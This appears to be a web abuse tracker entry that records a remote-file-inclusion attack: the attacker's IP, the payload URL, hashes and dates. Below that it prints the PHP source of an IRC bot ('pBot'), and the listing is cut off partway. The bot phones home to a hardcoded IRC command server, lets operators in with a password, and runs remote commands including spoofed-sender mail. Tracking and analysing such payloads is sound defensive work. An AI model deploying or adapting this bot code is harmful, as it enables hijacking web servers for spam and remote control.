Web abuse Tracker
Below you can see some information concerning the script with the MD5 94c17d6e0cff730cb95c78dde1973ccb. The page shows you the different locations (RFI URLs) of the script and the systems (IPs) which has tried to inject the script.
Script locations (RFI URLs)
| Script URL | File hash (MD5) | counter |
| http://189.126.119.103:8887/teste/stx.1 | 94c17d6e0cff730cb95c78dde1973ccb | 2 |
Related IPs
| IP address | Hostname | Script URL | country |
| 189.126.119.103 | xxxcnn2191.hospedagemdesites.ws | http://189.126.119.103:8887/teste/stx.1 |  |
RFI script
| Firstseen: | 2009-08-13 07:24:42 |
| Lastseen: | 2009-08-14 14:48:55 |
| Script size: | 5'580 Bytes |
Bot Rodanduu!!!
<?
set_time_limit(0);
error_reporting(0);
class pBot
{
var $config = array("server"=>"189.126.119.103",
"port"=>"2000",
"pass"=>"", //senha do server
"prefix"=>"[xupeta]",
"maxrand"=>12,
"chan"=>"#xupeta",
"key"=>"", //senha do canal
"modes"=>"+p",
"password"=>"ice123123", //senha do bot
"trigger"=>".",
"hostauth"=>"*" // * for any hostname
);
var $users = array();
function start()
{
if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30)))
$this->start();
$ident = "xd";
$alph = range("a","z");
for($i=0;$i<$this->config['maxrand'];$i++)
$ident .= $alph[rand(0,25)];
if(strlen($this->config['pass'])>0)
$this->send("PASS ".$this->config['pass']);
$this->send("USER $ident 127.0.0.1 localhost :$ident");
$this->set_nick();
$this->main();
}
function main()
{
while(!feof($this->conn))
{
$this->buf = trim(fgets($this->conn,512));
$cmd = explode(" ",$this->buf);
if(substr($this->buf,0,6)=="PING :")
{
$this->send("PONG :".substr($this->buf,6));
}
if(isset($cmd[1]) && $cmd[1] =="001")
{
$this->send("MODE ".$this->nick." ".$this->config['modes']);
$this->join($this->config['chan'],$this->config['key']);
}
if(isset($cmd[1]) && $cmd[1]=="433")
{
$this->set_nick();
}
if($this->buf != $old_buf)
{
$mcmd = array();
$msg = substr(strstr($this->buf," :"),2);
$msgcmd = explode(" ",$msg);
$nick = explode("!",$cmd[0]);
$vhost = explode("@",$nick[1]);
$vhost = $vhost[1];
$nick = substr($nick[0],1);
$host = $cmd[0];
if($msgcmd[0]==$this->nick)
{
for($i=0;$i<count($msgcmd);$i++)
$mcmd[$i] = $msgcmd[$i+1];
}
else
{
for($i=0;$i<count($msgcmd);$i++)
$mcmd[$i] = $msgcmd[$i];
}
if(count($cmd)>2)
{
switch($cmd[1])
{
case "QUIT":
if($this->is_logged_in($host))
{
$this->log_out($host);
}
break;
case "PART":
if($this->is_logged_in($host))
{
$this->log_out($host);
}
break;
case "PRIVMSG":
if(!$this->is_logged_in($host) && ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == "*"))
{
if(substr($mcmd[0],0,1)==".")
{
switch(substr($mcmd[0],1))
{
case "xuser":
if($mcmd[1]==$this->config['password'])
{
$this->privmsg($this->config['chan'],"[\2Lo\2GG\2eD\2]: :))) Yeah Yeah => $nick");
$this->log_in($host);
}
else
{
$this->privmsg($this->config['chan'],"[\2La\2Ma\2aH\2]: :((( Dont Steal me LLammaH => $nick");
}
break;
}
}
}
elseif($this->is_logged_in($host))
{
if(substr($mcmd[0],0,1)==".")
{
switch(substr($mcmd[0],1))
{
case "restart":
$this->send("QUIT :restart");
fclose($this->conn);
$this->start();
break;
case "mail": //mail to from subject message
if(count($mcmd)>4)
{
$header = "From: <".$mcmd[2].">";
if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header))
{
$this->privmsg($this->config['chan'],"[\2m\2ail\2]: Impossivel de Enviar");
}
else
{
$this->privmsg($this->config['chan'],"[\2m\2ail\2]: Mensagem Enviado para \2".$mcmd[1]."\2");
}
}
break;
case "dns":
if(isset($mcmd[1]))
{
$ip = explode(".",$mcmd[1]);
if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2])